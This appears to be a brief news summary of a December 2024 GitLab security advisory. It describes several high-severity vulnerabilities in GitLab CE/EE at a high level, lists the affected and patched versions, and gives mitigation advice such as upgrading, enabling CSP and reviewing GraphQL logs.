GitLab Issues Security Advisory for Multiple Vulnerabilities
/ 3 min read
Quick take - GitLab issued a security advisory on December 11, 2024, highlighting multiple high-severity vulnerabilities in its Community and Enterprise Editions, urging users to update to patched versions to mitigate risks such as account takeovers and denial of service attacks.
Fast Facts
- GitLab issued a security advisory on December 11, 2024, addressing multiple high-severity vulnerabilities in both Community and Enterprise Editions prior to specific patched versions.
- Key vulnerabilities include Account Takeover (ATO), Denial of Service (DoS), Session Hijacking, Open Redirect, and Information Disclosure, with a CVSS score of 8.7.
- Users are urged to upgrade to patched versions: GitLab CE 17.6.2, 17.5.4, and 17.4.6 to mitigate risks.
- GitLab recommends enabling Content Security Policy (CSP) to reduce Cross-Site Scripting (XSS) risks and encourages participation in the HackerOne bug bounty program.
- Administrators should regularly monitor logs, particularly GraphQL logs, to minimize potential exposure of sensitive information.
GitLab Issues Security Advisory for Critical Vulnerabilities
On December 11, 2024, GitLab issued a significant security advisory detailing multiple vulnerabilities affecting both its Community Edition (CE) and Enterprise Edition (EE). These vulnerabilities pose serious risks, including potential account takeovers and denial of service attacks. Users and administrators are urged to review the advisory and implement necessary updates to protect their systems.
High-Severity Vulnerabilities Identified
The advisory highlights several high-severity vulnerabilities reported by security researchers through GitLab’s HackerOne bug bounty program. Among these is an Account Takeover (ATO) vulnerability involving the injection of Network Error Logging (NEL) headers in Kubernetes proxy responses. This flaw allows attackers to manipulate OAuth flows, potentially granting unauthorized access to user accounts.
Another critical issue is a Denial of Service (DoS) vulnerability. Attackers can exploit this by sending repeated unauthenticated requests for diff files, overwhelming the system and rendering it unavailable to legitimate users.
Additional Security Concerns
Other notable vulnerabilities include Session Hijacking via the misuse of the CI_JOB_TOKEN. This could enable attackers to impersonate victims by obtaining their GitLab session tokens. An Open Redirect Vulnerability in the releases API can be exploited to divert users to malicious websites, facilitating phishing attacks. Additionally, an Information Disclosure vulnerability could leak branch names from confidential repositories, exposing sensitive project details.
Technical Details and Affected Versions
These vulnerabilities are cataloged under CVE-2024-11274 with a CVSS score of 8.7, indicating high severity. Affected versions include all GitLab CE/EE releases starting from version 16.1 up to 17.4.5, 17.5 up to 17.5.3, and 17.6 up to 17.6.1.
To mitigate these risks, GitLab strongly recommends upgrading to the following patched versions:
- GitLab Community Edition (CE): 17.6.2, 17.5.4, 17.4.6.
Recommended Actions for Users
In addition to upgrading, GitLab advises enabling Content Security Policy (CSP) to reduce Cross-Site Scripting (XSS) attack risks related to HTML injection vulnerabilities. Users are encouraged to participate in the HackerOne bug bounty program to report any discovered vulnerabilities, contributing to ongoing security improvements.
Administrators should also regularly review and monitor logs, particularly GraphQL logs, for any sensitive information that may have been retained, ensuring potential exposure is minimized.
GitLab’s advisory underscores the critical importance of timely updates and maintaining security vigilance to protect against vulnerabilities that can significantly impact user security and system integrity.
